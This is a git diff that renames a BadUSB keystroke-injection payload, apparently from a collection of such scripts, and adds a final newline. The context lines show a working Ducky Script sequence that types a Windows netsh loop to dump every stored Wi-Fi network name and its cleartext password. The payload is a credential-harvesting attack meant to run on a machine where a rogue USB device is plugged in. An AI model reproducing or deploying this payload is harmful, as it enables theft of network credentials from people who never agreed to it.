diff --git a/BadUSB/Show_WiFi_Pass.txt b/BadUSB/Show_WiFi_Passwords.txt similarity index 93% rename from BadUSB/Show_WiFi_Pass.txt rename to BadUSB/Show_WiFi_Passwords.txt index c34b6fba..ee08e828 100644 --- a/BadUSB/Show_WiFi_Pass.txt +++ b/BadUSB/Show_WiFi_Passwords.txt @@ -11,4 +11,4 @@ ENTER DELAY 250 STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content" DELAY 250 -ENTER \ No newline at end of file +ENTER